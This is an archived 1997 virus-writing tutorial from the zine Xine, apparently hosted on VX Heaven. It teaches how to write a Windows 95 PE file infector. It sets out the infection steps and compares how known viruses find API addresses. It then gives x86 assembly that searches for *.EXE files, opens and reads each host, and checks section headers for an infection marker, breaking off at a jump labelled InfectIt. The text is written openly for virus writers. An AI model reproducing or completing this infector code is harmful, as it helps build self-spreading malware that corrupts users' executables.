VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

PE Infection school

Xine [2]
April 1997

[Back to index] [Comments]

Infecting a PE files is a little complex unlike in dos, you must also do some "strange" things to open and read files. For those among us who do know little about Windows this may be tough to grasp but it just another hurdle that Microsoft has put in virii writers/just plain hackers of Win95.

I will try in this article to break it down into managable steps but I will concentrate on the infection part and leave the other aspects to other articles, and other people I hope to explain. This article will be specific to a PE infector that will add a section. Try reading the last 2 vlad's and IR latest zine for more info on RVA's and other PE win95 features. Ok I will probaly glance over things that you might feel are important if so I hope you take the hint that "you" might need to study some more.

Here we go school is in session, lets start with some info that we all as virii writers or researchers should know the steps a virus makes to spread.

  1. Find a file
  2. Read enough of the file into a buffer to determine
    • If it is a file the virii can infect.
    • If it is already infected
  3. At this point we know the file is appears to be a proper host.
    • Write the virii to the end of the host.
    • Modify the header, write it to the host
    • Close the host
  4. Well at this point we return control to the orginal host. (this is a part I am going to only give a glimpse at)

Due to the way Win95 "guards" the interrupts, the virii needs to get access to the Win API.

Bizatch: The first VLAD PE virus saves the API's address in it this form of hardcodeing can cause the virus to fail in other version of Win95.

Punch: The VLAD VxD virus does this by fooling with the imports and then fixing it so the host see it as it should be

Mr Klunky: IR's VxD virus, not sure sorry Mr K just have not had time

Murkry: The first PE header infector (by my friend) also use the hardcodeing method

Spawn95: This virus is a companion virus and of course use the API's like a normal PE program does

Puma : First seen in this issue of Zine 2 use a search engine to get the API address. Should be more robust then the hardcode method but Punch95 method should be a better way.

Ok a brief synaspe of some Win95 virus and how they grab API's well I wanted a simple way, and sorta wanted it to be like DOS infections. Hmm well there is away to call int 21's in Win95 you need the first Exported API which is called CallVxD0 by some books this program will use this method this will have a added advatage of allowing the virus to use Int 21 like calls. But may not be as robust as Punch's method, it should work better than straight hardcodeing. Read the notes on the GetProc engine in Zine 2 to find out more about this. Also the article on hooking API's in Zine 2.

Wow thats enough of a Tangent and probaly bored the hell out of most of ya ;). On to the virii code,

Find a file.

Well Win95 has a Findfirst and FindNext routine we can call using VxDcall -int21(just called int21 for now on) if this looks familiar it should its just the Win95 version of int 21 4eh, and int 21 4fh

FILE	equ	00400300h	;data
FNAME	EQU	02CH		;for the find file routines

Fexe	db	'*.EXE',0

	mov eax,0000714eh
	mov edx,offset Fexe
	xor esi,esi
	inc esi
	push ds
	pop es
	mov Edi, FILE
	xor ecx,ecx
	Call INT_21
	mov ebx,eax

;ax = 714Fh
;bx = file handle from previous search
;si = date time requested
;es:di buffer for findata
;note ebx = the search handle

	mov eax,0000714fh
	mov esi,1
	mov edi, FILE
	call INT_21

Read enough of the file into a buffer to determine If it is a file the virii can infect.

again use the int21 open file

;usual dos function here just need the filename from the search routine
;check cf for error
	mov eax,00003d02h
	mov Edx,FILE + FNAME
	xor ecx,ecx
	call INT_21
	mov EBX,eax


use the int21 read file

;ecx number of bytes
;edx = where we write the info to
	mov eax, 00003f00h
	;mov ecx,2
	;mov Edx,OFFSET test

	call INT_21

but win95 throws a problem here you cant write to the host data it mite be initialize date and you would destroy it. So I am using the "dead" space from the PE header to the first segment to write to this is only possible due to the fact the the VxD calls are ignoring the limits that win95 can put on us. Then I can move the important stuff to the stack and read write there. The stack is small and rather than change it I use is as little as I can.

Ok we know have the header in memory the typical PE header is including the intersting tables is about 1K in size. Actaul its usual alot smaller but 1k will read in the dos MZ header and the PE part.

If it is already infected

Well for this test we can check the section names for our header XINE is a good name as any ;). so we check to the last section header. 1 find the PE find the offset by looking into the MZ header at offset 3ch then use that offset to get the other info just for simplicity () means the value we are pointing at [] means a constant

PEhder(3CH) + PE_SIZE[F8H]+ ((NumSect(6)-1) * SecSze[28H]) ok this value is the pointer to the last section header name now put this in esi and do lodsw

	mov esi,[PEHDER]		;3Ch
	push esi
	add esi,6
	mov eax,[esi]
	dec eax

	mov cx,SECSZE			;28h
	mul cx
	pop ecx
	add eax,ecx
	add eax,PeSize ;0F8h
	push eax
	pop esi
	cmp eax,"xki."
	jne InfectIt
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka